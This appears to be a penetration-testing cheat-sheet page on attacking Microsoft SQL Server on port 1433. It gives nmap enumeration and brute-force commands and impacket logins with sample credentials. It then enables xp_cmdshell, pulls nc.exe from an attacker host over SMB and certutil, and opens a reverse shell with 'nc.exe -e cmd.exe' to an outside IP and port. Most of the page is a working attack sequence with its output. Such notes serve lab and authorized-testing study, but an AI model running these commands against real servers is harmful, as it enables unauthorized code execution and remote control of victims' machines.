MsSQL (Port 1433)

Quick Intro

Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).

Nmap Scripts

nmap -n -v -sV -Pn -p 1433 –script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password $ip

BruteForce

nmap -n -v -sV -Pn -p 1433 –script ms-sql-brute –script-args userdb=users.txt,passdb=passwords.txt $ip

RCE with SQL Server

We can use mssql.py to login and execute the commands

mssqlclient.py <domain>/<username>:<password>@$ip

mssqlclient.py bathry/admin:[email protected]

impacket-mssqlclient Administrator:[email protected] -windows-auth
select @@version;
SELECT name FROM sys.databases;
SELECT * FROM dbname.information_schema.tables;

Enabled Code execution
Copied the Nishang reverse shell to current directory and added localhost and port to it and start hosting server

SQL> enable_xp_cmdshell

SQL> xp_cmdshell copy \\10.10.16.26\gabbar\nc.exe %temp%\nc.exe

SQL> xp_cmdshell %temp%/nc.exe -e cmd.exe 10.10.16.26 4444

Complete code:

kali@kali:~$ impacket-mssqlclient Administrator:[email protected] -windows-auth
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
...
SQL> EXECUTE sp_configure 'show advanced options', 1;
[*] INFO(SQL01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
[*] INFO(SQL01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;

enable_xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
SELECT IS_SRVROLEMEMBER('sysadmin');
EXEC xp_cmdshell 'dir c:\users\public';

EXEC xp_cmdshell 'certutil.exe -urlcache -split -f http://10.10.143.147:2233/nc.exe c:\users\public\nc.exe';
EXEC xp_cmdshell dir c:\users\public

EXECUTE xp_cmdshell 'certutil.exe -urlcache -split -f http://10.10.143.147:9090/nc.exe c:\users\public\nc.exe'
xp_cmdshell "certutil.exe -urlcache -split -f http://10.10.143.147:9090/nc.exe c:\users\public\nc.exe"
xp_cmdshell "certutil.exe -urlcache -split -f http://10.10.143.147:9090/nc.exe %temp%\nc.exe

PreviousMySQL (Port 3306)NextOracle (Port 1521)

Last updated 7 months ago

hashtagQuick Intro

hashtagNmap Scripts

hashtagBruteForce

hashtagRCE with SQL Server

Quick Intro

Nmap Scripts

BruteForce

RCE with SQL Server